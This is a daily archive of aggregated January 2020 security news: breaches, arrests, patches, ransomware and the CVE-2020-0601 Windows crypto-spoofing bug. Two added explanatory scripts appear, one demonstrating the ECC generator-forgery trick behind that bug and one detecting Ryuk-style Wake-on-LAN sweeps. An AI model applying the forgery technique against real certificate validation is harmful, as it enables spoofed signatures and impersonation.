Daily Archives: January 17, 2020

Threat Roundup for January 10 to January 17

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between Jan 10 and Jan 17. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More


TRU01172020 – This is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for January 10 to January 17 appeared first on Cisco Blogs.

Friday Squid Blogging: Giant Squid Genome Analyzed

This is fantastic work:

In total, the researchers identified approximately 2.7 billion DNA base pairs, which is around 90 percent the size of the human genome. There's nothing particularly special about that size, especially considering that the axolotl genome is 10 times larger than the human genome. It's going to take some time to fully understand and appreciate the intricacies of the giant squid's genetic profile, but these preliminary results are already helping to explain some of its more remarkable features.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Hack the Army bug bounty program paid $275,000 in rewards

Hack the Army bug bounty program results: 146 valid vulnerabilities were reported by white hat hackers and more than $275,000 were paid in rewards.

The second Hack the Army bug bounty program ran between October 9 and November 15, 2019 on the HackerOne platform. The program, operated by the Defense Digital Service together with the U.S. Department of Defense (DoD), paid more than $275,000 in rewards for a total of 146 valid vulnerabilities.

52 white hat hackers took part in the Hack the Army program. The U.S. Army asked participants to test more than 60 publicly accessible web assets, including *.army.mil, *.goarmy.mil, and the Arlington Cemetery website.

Participants were from the U.S., Canada, Romania, Portugal, the Netherlands, and Germany.

“Participation from hackers is key in helping the Department of Defense boost its security practices beyond basic compliance checklists to get to real security,” said Alex Romero, Digital Service Expert at the Department of Defense’s Defense Digital Service. “With each Hack the Army challenge, our team has strengthened its security posture.”

“The partnership with DDS demonstrates a fun and creative way to safely find solutions, so we look forward to building on this relationship to create future events,” said a US Army Cyber Command spokesperson.

On November 20, during the awards ceremony held in Augusta, Georgia, the top three hackers, @alyssa_herrera, @erbbysam, and @cdl, were rewarded for their contributions. The three experts also spoke about their experience in the program.

“The Department of Defense programs are some of my favorites to hack on, and Hack the Army 2.0 was one of the most rewarding,” said second place winner @alyssa_herrera. “It is so exciting to know that the vulnerabilities I find go towards strengthening Army defenses to protect millions of people. Coming in second place and being invited to spend time with the hackers and soldiers I worked alongside made the impact we made in this Challenge feel even bigger.”

More information on the past edition of the Hack the Army program and results are available here.

Pierluigi Paganini

(SecurityAffairs – Hack the Army, hacking)

The post Hack the Army bug bounty program paid $275,000 in rewards appeared first on Security Affairs.

Windows 7 is dead, but 25% of large businesses in Canada are still running it on desktops, says IDC survey

No, it won't suddenly cease to function, as anyone who booted it up after the end-of-support deadline of January 14 discovered. It works just fine once you get past the full-screen warning from Microsoft that you are now at risk because you're running an unsupported operating system. But that warning isn't scaring businesses away from using it.

Don’t Let the Vulnera-Bullies Win. Patch Against Vulnerability CVE-2020-0601 with our Free Tool!

So much for a quiet January! By now you must have heard about the new Microsoft® vulnerability CVE-2020-0601, reported to Microsoft by the NSA (making it the first Windows bug Microsoft has publicly credited to the National Security Agency). The flaw sits in Windows CryptoAPI (crypt32.dll), the cryptographic component that, among other things, validates the certificates behind digitally signed software, the signature being what certifies that the software has not been tampered with. Because the component fails to properly validate elliptic-curve (ECC) certificates, an attacker can craft a certificate that appears to chain to a trusted root and use it to sign malicious executables so they look legitimate, or to impersonate HTTPS servers in potentially disastrous man-in-the-middle attacks.
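As an added example (not code from this post, from Microsoft, or from the NSA advisory), the script below reproduces the publicly described root cause of CVE-2020-0601; it also illustrates the "Microsoft Patches Major Crypto Spoofing Bug" item further down this page. The flaw was that CryptoAPI matched an ECC certificate to a cached trusted root by public key alone while still honoring explicit curve parameters carried inside the certificate. The generator G is one of those parameters, so an attacker who knows a root's public key Q can pick any private key d' and set G' = d'^-1 * Q, giving d' * G' = Q: the attacker's signatures then verify under the root's public key whenever the verifier uses the attacker's G'. The textbook P-256 arithmetic, the ECDSA routines, the key values, the nonce, and the dict-based stand-ins for certificates and for the flawed and corrected matching checks are all constructed for this demo and are not crypt32's code. It needs Python 3.8+ for pow(x, -1, m).

```python
"""CVE-2020-0601 root cause on P-256: same public key, attacker-chosen generator.

Added example, not Microsoft's or Trend Micro's code. Textbook affine EC
arithmetic and ECDSA; needs Python 3.8+ for pow(x, -1, m). All key values
and the dict-based "certificates" are constructed for the demo.
"""
import hashlib

# NIST P-256 domain parameters (the named curve).
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)


def ec_add(p1, p2):
    """Affine addition on y^2 = x^3 + A*x + B over GF(P); None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None                      # p1 == -p2
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, point):
    """Double-and-add scalar multiplication; scalars live in Z/N."""
    result = None
    k %= N
    while k:
        if k & 1:
            result = ec_add(result, point)
        point = ec_add(point, point)
        k >>= 1
    return result


def ecdsa_sign(priv, gen, z, k):
    """Textbook ECDSA over generator gen. The nonce k is fixed here only for the demo."""
    r = ec_mul(k, gen)[0] % N
    s = pow(k, -1, N) * (z + r * priv) % N
    return (r, s)


def ecdsa_verify(pub, gen, z, sig):
    """Verify using whatever generator the caller supplies; trusting that choice is the bug."""
    r, s = sig
    if not (0 < r < N and 0 < s < N):
        return False
    w = pow(s, -1, N)
    point = ec_add(ec_mul(z * w % N, gen), ec_mul(r * w % N, pub))
    return point is not None and point[0] % N == r


def forge_generator(root_pub, attacker_priv):
    """Choose G' = attacker_priv^-1 * Q so that attacker_priv * G' == Q (the root's key)."""
    return ec_mul(pow(attacker_priv, -1, N), root_pub)


def matches_root_vulnerable(cert, root):
    """Flawed match: a cert is trusted if its public key equals a cached root's key."""
    return cert["pub"] == root["pub"]


def matches_root_fixed(cert, root):
    """Correct match: key, curve and generator must agree, and explicit parameters are refused."""
    return (cert["pub"] == root["pub"]
            and cert["curve"] == root["curve"] == "P-256"   # named curve only
            and cert["gen"] == root["gen"])


def demo():
    """Run the forgery end to end and return the checks as a dict."""
    z = int.from_bytes(hashlib.sha256(b"malicious.exe").digest(), "big")
    root_priv = 0xC0FFEE1337                      # constructed; the attacker never learns it
    root = {"curve": "P-256", "gen": G, "pub": ec_mul(root_priv, G)}
    attacker_priv = 0xBADC0DE42                   # constructed
    evil_gen = forge_generator(root["pub"], attacker_priv)
    # The forged cert reuses the root's public key but carries explicit parameters with G'.
    cert = {"curve": "explicit", "gen": evil_gen, "pub": root["pub"]}
    sig = ecdsa_sign(attacker_priv, evil_gen, z, k=0x1234567)
    return {
        "attacker_key_yields_root_pub": ec_mul(attacker_priv, evil_gen) == root["pub"],
        "sig_valid_with_cert_params": ecdsa_verify(cert["pub"], cert["gen"], z, sig),
        "sig_valid_with_real_params": ecdsa_verify(root["pub"], root["gen"], z, sig),
        "vulnerable_check_accepts": matches_root_vulnerable(cert, root),
        "fixed_check_accepts": matches_root_fixed(cert, root),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running it shows the attacker's signature verifying only when the certificate's own parameters are used, never under the real P-256 generator, and the corrected check refusing the certificate because it carries explicit parameters instead of the named curve the root uses. The operational lesson is the one this post gives: apply the January update. For code you write yourself, never accept explicit EC parameters from an untrusted certificate; require the named curve.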


Here’s the good news. Microsoft has already released a patch to protect against any exploits stemming from this vulnerability. But here’s the catch: You have to patch!

While Trend Micro offers industry-leading virtual patching capabilities via our endpoint, cloud, and network security solutions, the best protection against vulnerabilities is to deploy a real patch from the software vendor. Let me say it again for effect – the best protection against this very serious vulnerability is to ensure the affected systems are patched with Microsoft’s latest security update.

We understand how difficult it can be to patch systems in a timely manner, so we created a tool that tests your endpoints to see whether they have been patched against this latest threat or are still vulnerable. Additionally, to ensure you are protected against potential threats, we have just released additional layers of protection in the form of IPS rules for Trend Micro Cloud One™ (formerly Trend Micro™ Deep Security™) and Trend Micro™ Vulnerability Protection™ (including Trend Micro Apex One™). These were rolled out to help organizations strengthen their overall security posture and provide some protection during lengthy patching processes.


You can download our Trend Micro Vulnerability Assessment Tool right now to see if you are protected against the latest Microsoft vulnerability. And while you’re at it, check out our latest Knowledge Base article for additional information on this new vulnerability along with the Trend Micro security capabilities that help protect customers like you 24/7. Even during those quiet days in January.


Fidelis Cybersecurity Acquired by Skyview Capital


An American company dedicated to thwarting cyber-attacks has been snapped up by a global private equity firm. 

Skyview Capital, LLC announced its acquisition of Fidelis Cybersecurity, Inc yesterday. Fidelis is located in the Maryland town of Bethesda, which a 2015 NerdWallet survey found to be the most educated place in America. 

Fidelis Cybersecurity is a leading provider of network traffic analysis and of digital forensics and incident response solutions that enable enterprises and government organizations to detect, hunt, and respond to advanced threats that evade traditional security solutions.

The company counts among its 250 employees some of the world's leading cybersecurity experts, including specialists from the US Department of Defense, the intelligence community, and industry.

Solutions developed by Fidelis are delivered as standalone network, endpoint, and deception products; an integrated platform; or as a constantly operational managed detection and response service that augments existing security operations, threat hunting, and incident response capabilities.

Fidelis was acquired from a consortium of investors in a stock transaction in a deal that serves to increase Skyview's existing software technology portfolio.

"With the ever-increasing complexity of digital environments and the pace of cyber threats across the world, we see an opportunity to build upon Fidelis' impressive technology and solidify its position within the IT security industry," said Alex Soltani, chairman and CEO of Skyview. 

"This transaction aligns well with our investment philosophy of targeting and investing in mission critical technology businesses across a wide spectrum of verticals, from telecommunications to cybersecurity."

The mission of Fidelis is not set to change as a result of the acquisition. 

Soltani said: "Skyview is committed to realizing the full value of Fidelis as a safeguard against cyber threats, and we are enthusiastic about identifying both organic and inorganic growth opportunities."

Nick Lantuh, president and chief executive officer of Fidelis Cybersecurity, sees the deal as a golden opportunity for growth. 

He said: "We are excited to partner with Skyview Capital and benefit from their ability to help us take the Fidelis platform, which provides unmatched visibility and empowers security teams to rapidly respond to threats, into other markets."

NortonLifeLock Puts Silicon Valley Real Estate Up for Sale


NortonLifeLock, formerly known as Symantec, has put ten large commercial buildings in California’s Silicon Valley on the market. 

The cybersecurity company is seeking a buyer for the properties, which are all based in the Mountain View area, close to the Google Quad Campus. The ten buildings on the market are grouped into three separate campuses, not more than a few minutes' drive from one another. 

Commercial real estate firm Cushman & Wakefield has been hired to help shift the properties, which together total 707,000 square feet. 

According to The Orange County Register, the buildings are featured in a brochure being circulated on behalf of NortonLifeLock. 

"Never before offered to the marketplace, the offering represents a generational opportunity to acquire a portfolio of 10 buildings totaling 706,737 square feet in the heart of Silicon Valley," states the brochure. 

Mountain View was the site of Symantec’s headquarters for many years, but in November the company, under its new name NortonLifeLock, relocated its operational nerve center to Tempe, Arizona. 

One of the three campuses for sale, described in the brochure as the "headquarters campus," is located at 350 Ellis Street. On this site are five buildings offering a total 428,000 square feet of office space. 

The second campus, which is made up of research and office buildings totaling 128,000 square feet, is located at 455, 487, and 501 E. Middlefield Road. The final clutch of office and research buildings, which together offer 150,000 square feet of space, is at 515 and 545 N. Whisman Road.

In an effort to keep the ten properties together, NortonLifeLock is ideally seeking a single buyer for all three campuses.

The brochure states that "it is a strong preference of the seller for one buyer to acquire the entire portfolio," however, "individual offers on the various components may be considered."

NortonLifeLock's decision to put the properties on the market comes amid a concerted effort by the company to downsize. Over the course of 2019, the company announced it would be terminating 320 jobs in Mountain View and a further 82 in San Francisco.

Teen Charged Over $50m SIM-Swapping Scam on Blockchain Experts


A teenager from Montreal is facing four criminal charges in connection with a $50m SIM-swapping scam that targeted two renowned Canadian Blockchain experts. 

Eighteen-year-old hacker Samy Bensaci is accused of being part of a crime ring that stole millions of dollars in crypto-currency by gaining unauthorized access to the cell phones of crypto-currency holders in America and Canada. 

Spokesperson for the Canadian police force, the Sûreté du Québec, Lieutenant Hugo Fournier, said the elaborate SIM-swapping cyber-fraud was responsible for the theft of "$50 million from our neighbors to the south and $300,000 in Canada."

Police say the crypto-currency thefts, which netted dozens of victims, were perpetrated by the gang in the spring of 2018. 

Among the alleged victims are renowned Toronto businessman, author, and head of the Blockchain Research Institute Don Tapscott and his son Alex, a globally recognized investor, advisor, and speaker on Blockchain technology and crypto-currencies. Together, father and son co-authored Blockchain Revolution: How the Technology Behind Bitcoin Is Changing Money, Business, and the World.

Bensaci was arrested in Victoria, British Columbia, in November and charged with fraudulently obtaining computer services, committing fraud over $5,000, identity fraud, and illegally accessing computer data. In December, the teen was released on $200,000 bail and ordered to live with his parents in northeast Montreal until his next court hearing.

According to La Presse, neighbors described Bensaci as a discreet young man who spends a lot of time on his computer.

While staying at his parents' residence, Bensaci is prohibited from accessing "any computer, tablet, mobile phone, game console, including PS3, PS4, Xbox, Nintendo Switch, or any other device capable of accessing the Internet," and banned from possessing or exchanging any form of crypto-currency. 

Many of the individuals allegedly targeted by the gang had attended the Consensus crypto-currency fair, held annually in New York.

"We suspect that hackers spot targets during such events," said American SIM-swapping victim Rob Ross. Ross, who was robbed of $1m in crypto-currency in two separate attacks by 21-year-old hacker Nicholas Truglia, now manages the StopSIMCrime.org website.

Ontario Provincial Police sent out an alert regarding the SIM-swap scam in November, along with a warning that fraudsters sometimes impersonate a target and falsely claim that their phone has been lost or stolen.

Winnipeg-based online pharmacy warns of data breach

A Winnipeg-based online pharmacy is still offline after telling customers their information including medications and medical history may have been compromised in a security incident.

As of Friday morning, PlanetDrugsDirect.com had been unreachable for over 36 hours, having gone offline shortly after Bleeping Computer broke the news that an unknown number of people were being notified. The company says it has 400,000 customers.

The site’s home page displays an error message as well as the statement, “This website is using a security service to protect itself from online attacks.”

Earlier in the week, the site offered a 1-888 number for customers to call for information. This morning when the number was dialled from Toronto a recorded message said it was not available from that calling area.

The notice to customers says what may have been exposed is the person’s “name, mailing address, e-mail address, telephone number(s), occupation, employment status, referral source, the name of your primary physician (and his or her contact information), age, height, weight, sex, date of birth, the existence and types of drug allergies, medications requested, family medical history information, your personal medical history information, details of your existing medications, credit card information (including card type and number, expiry date and name of cardholder) and prescription information.”

Customers are being asked to monitor their bank and credit card accounts for suspicious activity.

The company says people can “buy cheap prescription medications safely online by a Canadian prescription referral service and have your order filled by a licensed international pharmacy.”

Created in 2001, PlanetDrugsDirect.com is one of many websites selling medicinal drugs around the world, particularly to the U.S., because prices are lower here.

In a 2014 press release the site called itself “a trusted online pharmacy offering service from Canada that provides 100 per cent safe prescription and non-prescription drugs at affordable prices with maximum protection and privacy of its customers. Hundreds of compliments are received every month from the existing happy customers along with increasing likes and shares on social media sites such as Facebook, Google+ and Twitter.”

The company also regularly mentions that it is a member of the Canadian International Pharmacy Association (CIPA), an industry association of licenced pharmacies.

“The most worrisome part of this breach is that hackers had access to patient contact information, medications taken, and payment information,” said Robert Capps, vice-president of market innovation for Vancouver-based NuData Security, a Mastercard company. “All this data could provide cybercriminals with enough information to craft fake email messages reminding them of a refill, for example, to trick victims into ordering prescription refills from untrusted sources or fake ones. Consumers should be wary of any emails that appear to come from a pharmacy and should avoid clicking links in such emails. We advise that consumers access their prescription drug reordering via the official website of their provider.

“Healthcare information has become increasingly valuable to cybercriminals, and there is a real risk that this and other stolen data could be used by an attacker to access a consumer’s healthcare organization. Healthcare organizations need to mitigate the damages of such breaches by verifying users by their online behaviour instead of the credentials that have been stolen by cybercriminals.”


Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity

Chinese authorities continue operations against unauthorized VPN services that are very popular in the country.

China continues to intensify its monitoring of cyberspace and its prosecution of the operators of VPN services, which can be used to bypass its censorship system, known as the Great Firewall.

The Great Firewall already blocks access to hundreds of the world’s top 1,000 websites, including Google, Facebook, Twitter, and Dropbox.

Since early 2019, the Chinese authorities have been banning “unauthorized” VPN services: any company offering such a service in the country must obtain a license from the government.

In December, the Chinese authorities sentenced a man to five-and-a-half years in prison for selling a VPN service without authorization.

According to an announcement from China’s Procuratorate Daily the man was also fined 500,000 yuan ($76,000). Prosecutors said the man was convicted of collecting “illegal revenue” of 792,638 yuan ($120,500) from his unauthorized activity.

Media now report a new arrest by Chinese authorities in the city of Taizhou: police arrested a 29-year-old man identified by the pseudonym Gao, who had operated a VPN service since mid-2016. Gao made more than 11 million yuan ($1.6 million) renting access to VPN servers to more than 28,000 regular customers. He pleaded guilty in 2019 and is still awaiting his final sentence.

In December 2017, Chinese authorities sentenced a man from Dongguan to nine months in prison for operating a VPN service that allowed him to earn $2,000. Other criminal cases were reported by Chinese authorities in the following months, blocked services had thousands of customers in the country.

In July 2017, in compliance with Chinese Internet monitoring law, Apple started removing iOS VPN apps from its App Store in China.

Pierluigi Paganini

(SecurityAffairs – Chinese authorities, privacy)

The post Chinese police arrested the operator of unauthorized VPN service that made $1.6 million from his activity appeared first on Security Affairs.

Utilizing real-time incentives to power change

By Kashmera Self As we enter a new decade, many people will be thinking about how they can improve their health, strengthen their communities or support the environment. Here at Interac Corp., we’re asking the same questions, albeit in slightly different ways. As Canada’s leading payments network, we have a 35-year history of providing Canadians…

Say hello to Microsoft’s new Chromium-based browser

Microsoft officially launched its new Chromium-based Edge browser for both Windows and macOS this week, and it is available for download now.

One of the biggest issues facing IT professionals is the cost and complexity of supporting two or more browsers so that both legacy and modern websites keep working. Microsoft is hoping to eliminate some of that frustration with enterprise features such as Internet Explorer mode, which lets businesses automatically load legacy IE-only sites inside Edge.

The new Edge browser also comes with Microsoft’s privacy promise and adds tracking prevention, with three levels of control to choose from while employees browse. Tracking prevention limits which third-party trackers can collect browsing data and gives users control over what they share. The SmartScreen filter complements it by warning users before they visit known phishing or malware sites and by blocking known malicious downloads.

A study conducted by Ponemon Institute in 2019 says a data breach costs companies $3.2 million on average.

In addition, new features like Collections will let employees more easily collect and organize web content and research, and export that information into Word or Excel. 

Jimmy Tom, research director at Info-Tech, noted in a recent presentation shared with IT World that the Chromium-based browser opens up new opportunities for Microsoft.

“In effect, Microsoft can now compete in other races that it has never before considered,” he wrote, adding it could provide them with an advantage against AWS as the cloud race between the two tech giants intensifies.

Additional benefits for users giving the new browser a try, he added, include having a much more unified experience for end-users on a platform that IT can control, as well as having the ability to easily port existing Chrome apps into Edge.


Microsoft Search in Bing can be easily accessed on mobile phones, thereby enabling knowledge workers to search for corporate information on the go.  


Microsoft Search in Bing also works in the new InPrivate mode, so that online browsing and searches by employees are not attributed to them.


The new Microsoft Edge browser also comes with a new logo. 


To pilot the new Edge browser in a corporate environment, IT administrators will need to download an offline deployment package; Microsoft says the new browser will not deploy automatically to enterprise or commercial customers. Tools such as Configuration Manager and Intune, the company adds, can simplify deployment.

The new browser is supported by FastTrack and App Assure. FastTrack lets businesses with an eligible subscription to Azure, Dynamics 365, or Microsoft 365 deploy the new browser at no extra charge. Microsoft also says that sites which work in legacy Microsoft Edge, Google Chrome, or Internet Explorer 8 and later will work the same way in the new Microsoft Edge.

The new Microsoft Edge is available in more than 90 languages and can be downloaded on all supported versions of Windows and macOS. It is also available for Android and iOS.



Domain Name of WeLeakInfo.com Seized by FBI and DOJ

The Federal Bureau of Investigations (FBI) and the Department of Justice (DOJ) announced that they have seized the domain name for weleakinfo.com. On January 16, the U.S. Attorney’s Office for the District of Columbia announced that the FBI and DOJ had executed a warrant to seize the domain of weleakinfo.com in cooperation with law enforcement […]… Read More

The post Domain Name of WeLeakInfo.com Seized by FBI and DOJ appeared first on The State of Security.

Podcast: Passwords: You Are the Weakest Link

Why are companies still recommending an 8-character password minimum?  Passwords are some of the easiest targets for attackers, yet companies still allow weak passwords in their environment. Multiple service providers recommend 8-character minimum passwords based on outdated data.  Download Slides: https://www.activecountermeasures.com/presentations Originally recorded as a live webcast on December 5th, 2019 Presented by: Darin Roberts & […]

The post Podcast: Passwords: You Are the Weakest Link appeared first on Black Hills Information Security.

This Week in Security News: The First Patch Tuesday Update of 2020 and Pwn2Own Vancouver Announced

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about a major crypto-spoofing bug impacting Windows 10 that has been fixed as part of Microsoft’s January Patch Tuesday update. Also, read about the launch of Pwn2Own Vancouver, where it will pay to hack a Tesla Model 3.

Read on:

Can You Hack a Tesla Model 3? $500,000 Says That You Can’t

Trend Micro’s Zero Day Initiative (ZDI) has officially announced that its Pwn2Own Vancouver competition will be hosted at CanSecWest March 18-20. This time, the stakes have been upped in the automotive category: the hacker who can evade the multiple layers of security found in a Tesla Model 3 to pull off a complete vehicle compromise will win a $500,000 prize and a new Tesla Model 3.

Texas School District Loses $2.3 Million to Phishing Scam, BEC

Manor Independent School District (MISD) in Texas is investigating an email phishing attack after a series of seemingly normal school-vendor transactions resulted in the loss of an estimated $2.3 million. According to the statement posted on Twitter, the district is cooperating with the Manor Police Department and the Federal Bureau of Investigation (FBI).

Equifax Settles Class-Action Breach Lawsuit for $380.5M

A Georgia court granted final approval for an Equifax settlement in a class-action lawsuit, after the credit-reporting agency was hit by its massive 2017 data breach. This week, the Atlanta federal judge reportedly ruled that Equifax will pay $380.5 million to settle lawsuits regarding the breach.

Sodinokibi Ransomware Increases Year-End Activity, Targets Airport and Other Businesses

The Sodinokibi ransomware, detected as Ransom.Win32.SODINOKIBI,was involved in several high-profile attacks in 2019. The ransomware ended the year by launching a new round of attacks aimed at multiple organizations, including the Albany International Airport and the foreign exchange company Travelex.

ICS Security in the Spotlight Due to Tensions with Iran

Given the heightened tensions between the U.S. and Iran, organizations with connected industrial infrastructure should be on guard. In the wake of the U.S. strike that killed Iranian general Qasem Soleimani, several cybersecurity experts and U.S. government officials have warned of the ICS security risk posed by Iran-affiliated adversaries. Others point to the likelihood of smaller cyberattacks designed to distract rather than to prompt retaliation.

Dymalloy, Electrum, and Xenotime Hacking Groups Set Their Targets on US Energy Sector

At least three hacking groups have been identified targeting power grids across the United States. The oil, gas, water and energy industries have become valuable targets for threat actors looking to compromise ICS environments, and according to a report on the state of industrial control systems (ICS), attacks on the utilities industry are on the rise.

Microsoft Patches Major Crypto Spoofing Bug

A major crypto-spoofing bug impacting Windows 10 users has been fixed as part of Microsoft’s January Patch Tuesday security bulletin. The vulnerability could allow an attacker to spoof a code-signing certificate, vital to validating executable programs in Windows, and make it appear as if an application was from a trusted source.

Mobile Banking Trojan FakeToken Resurfaces, Sends Offensive Messages Overseas from Victims’ Accounts

Researchers recently discovered an updated version of the mobile banking trojan FakeToken after detecting 5,000 smartphones sending offensive text messages overseas. Once the malware infects an unprotected Android device, FakeToken is able to send and intercept text messages such as 2FA codes or tokens, as well as scan through the victim’s contacts to possibly send phishing messages.

Report: Chinese Hacking Group APT40 Hides Behind Network of Front Companies

An online group of cybersecurity analysts calling themselves “Intrusion Truth” doxed their fourth Chinese state-sponsored hacking operation. After previously exposing details about Beijing’s hand in APT3 (believed to operate out of the Guangdong province), APT10 (Tianjin province), and APT17 (Jinan province), Intrusion Truth has now begun publishing details about China’s cyber apparatus in the state of Hainan, an island in the South China Sea.

What are your thoughts on the major crypto-spoofing bug that was found by the NSA? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.


Cyber News Rundown: Ryuk Uses Wake-on-Lan

Reading Time: ~ 2 min.

Ryuk Adds New Features to Increase Devastation

The latest variant of the devastating Ryuk ransomware has been spotted with a new feature that lets it power on other devices connected to the infected network. By taking advantage of Wake-on-LAN, Ryuk can wake machines that are switched off, mount them remotely and extend its encryption to them. While it is possible to allow such commands only from an administrator’s machine, those are also the machines most likely to be compromised, since they have the broadest access.
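The magic packet that Wake-on-LAN relies on is a plain UDP payload, so the behaviour described above is easy to hunt for on the wire. The Python below is an added example, not code from the Webroot post or from the Ryuk sample: it parses the magic-packet format (six 0xFF bytes, then the target MAC repeated sixteen times, optionally followed by a 4- or 6-byte SecureOn password) and flags any host that wakes more than a handful of distinct machines, the sweep pattern of a single infected host trying to bring every neighbour online. The sample traffic, the IP addresses and the five-target threshold are constructed for the demo; the UDP port filter (7 and 9) is the usual convention and should be widened if your captures show magic packets elsewhere.

```python
"""Hunt for Wake-on-LAN sweeps in captured UDP traffic.

Added example, not code from the Webroot post or from Ryuk. Parses the
magic-packet format and flags a source that wakes many distinct MACs. The
sample traffic, addresses and threshold below are constructed for the demo.
"""
from collections import defaultdict

SYNC = b"\xff" * 6      # synchronization stream that opens every magic packet
MAC_LEN = 6
REPEATS = 16            # the target MAC follows, repeated 16 times
BODY_LEN = len(SYNC) + MAC_LEN * REPEATS   # 102 bytes before any SecureOn password
WOL_PORTS = (7, 9)      # conventional destination ports; widen if your captures differ


def parse_magic_packet(payload: bytes):
    """Return the target MAC as 'aa:bb:cc:dd:ee:ff' if payload is a magic packet, else None.

    Accepts the bare 102-byte body or the body plus a 4- or 6-byte SecureOn password.
    """
    if len(payload) not in (BODY_LEN, BODY_LEN + 4, BODY_LEN + 6):
        return None
    if payload[:len(SYNC)] != SYNC:
        return None
    mac = payload[len(SYNC):len(SYNC) + MAC_LEN]
    if payload[len(SYNC):BODY_LEN] != mac * REPEATS:
        return None
    return ":".join(f"{b:02x}" for b in mac)


def build_magic_packet(mac: str, password: bytes = b"") -> bytes:
    """Build a magic packet for mac; used here only to construct sample traffic."""
    return SYNC + bytes.fromhex(mac.replace(":", "")) * REPEATS + password


def find_wol_sweeps(packets, min_targets=5):
    """Map each source IP to the distinct MACs it tried to wake; keep sources at or above min_targets.

    packets: iterable of (src_ip, dst_port, udp_payload). A legitimate scheduler (patching,
    imaging) can also wake many hosts, so tune min_targets and allow-list those sources.
    """
    woken = defaultdict(set)
    for src, dport, payload in packets:
        if dport not in WOL_PORTS:
            continue
        mac = parse_magic_packet(payload)
        if mac is not None:
            woken[src].add(mac)
    return {src: sorted(macs) for src, macs in woken.items() if len(macs) >= min_targets}


# Constructed sample: an admin box waking one PC, plus an infected host sweeping
# every MAC in its ARP cache before trying to mount the woken machines.
SAMPLE_PACKETS = [
    ("10.0.0.5", 9, build_magic_packet("00:11:22:33:44:55")),
    ("10.0.0.5", 9, b"definitely not a magic packet"),
    ("10.0.0.5", 53, build_magic_packet("00:11:22:33:44:66")),   # wrong port, ignored
] + [
    ("10.0.0.77", 7, build_magic_packet(f"00:11:22:33:44:{i:02x}")) for i in range(1, 9)
]

if __name__ == "__main__":
    for src, macs in find_wol_sweeps(SAMPLE_PACKETS).items():
        print(f"{src} sent magic packets to {len(macs)} hosts: {', '.join(macs)}")
```

Feed it the UDP payloads from a capture (or a NetFlow-style export with payloads) and allow-list the hosts that are supposed to issue wake-ups; a workstation that is not on that list and suddenly wakes a dozen neighbours is worth an immediate look, since in the scenario above it is the encryption that follows the wake-up that does the damage.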

Learn more about ransomware infections and how to protect your data from cybercrime.

Bank Hackers Arrested Outside London

Over the course of six years, two individuals were able to successfully hack into many hundreds of bank and phone accounts with the intent to commit fraud. With the information they gathered, the two were also able to open new credit accounts and take out significant loans to purchase extra tech hardware. Officials for the London Metropolitan Police have made it known that cybercrime is taken just as seriously as any other crime.

Cryptominer Found After Multiple BSODs

Following a series of “blue screens of death” (BSoDs) on a medical company’s network, researchers identified a cryptominer that had spread to more than 800 machines in just a couple of months. The payload, a Monero miner, was hidden inside a WAV file, which let it move between systems undetected before the miner itself executed. To spread efficiently, the infection used the long-patched EternalBlue exploit against machines on the network that had still not received the fix, leaving them fully susceptible to attack.

Consulting Firm Exposes Professional Data

Thousands of business professionals from the UK have potentially fallen victim to a data leak by the major consulting firm CHS. A server belonging to the company was found to contain passports, tax information and other sensitive data, apparently archived from background checks, in an unsecured Amazon Web Services S3 bucket. While it is still unclear how long the data was exposed, the researchers who discovered the leak quickly contacted both CERT-UK and Amazon directly, and the server was promptly secured.

Western Australian Bank Breached

Over the last week officials at P&N Bank in Australia have been contacting customers about a data breach that occurred during a server upgrade in early December. Though personally identifiable information was exposed, it appears to be limited to customer contact details, and there is no indication that any accounts were illicitly accessed. The total number of affected customers has yet to be confirmed.

The post Cyber News Rundown: Ryuk Uses Wake-on-Lan appeared first on Webroot Blog.

Microsoft Application Inspector: Check open source components for unwanted features

Want to know what’s in an open source software component before you use it? Microsoft Application Inspector will tell you what it does and spots potentially unwanted features – or backdoors. About Microsoft Application Inspector “At Microsoft, our software engineers use open source software to provide our customers high-quality software and services. Recognizing the inherent risks in trusting open source software, we created a source code analyzer called Microsoft Application Inspector to identify ‘interesting’ features … More

The post Microsoft Application Inspector: Check open source components for unwanted features appeared first on Help Net Security.

Oracle Issues Record CPU with 334 Patches

Oracle has hit an all-time record for number of security fixes issued in a critical patch update (CPU), providing sysadmins with over 330 in its first quarterly release of the decade.

The enterprise software giant issued 334 patches in total across more than 90 products this week. As such, January 2020 easily beats the previous largest CPU, consisting of 308 fixes in July 2017.

Oracle strongly urged firms to apply the patches as soon as possible, noting that attackers have successfully compromised customers who failed to update their systems promptly. There are, however, short-term mitigations.

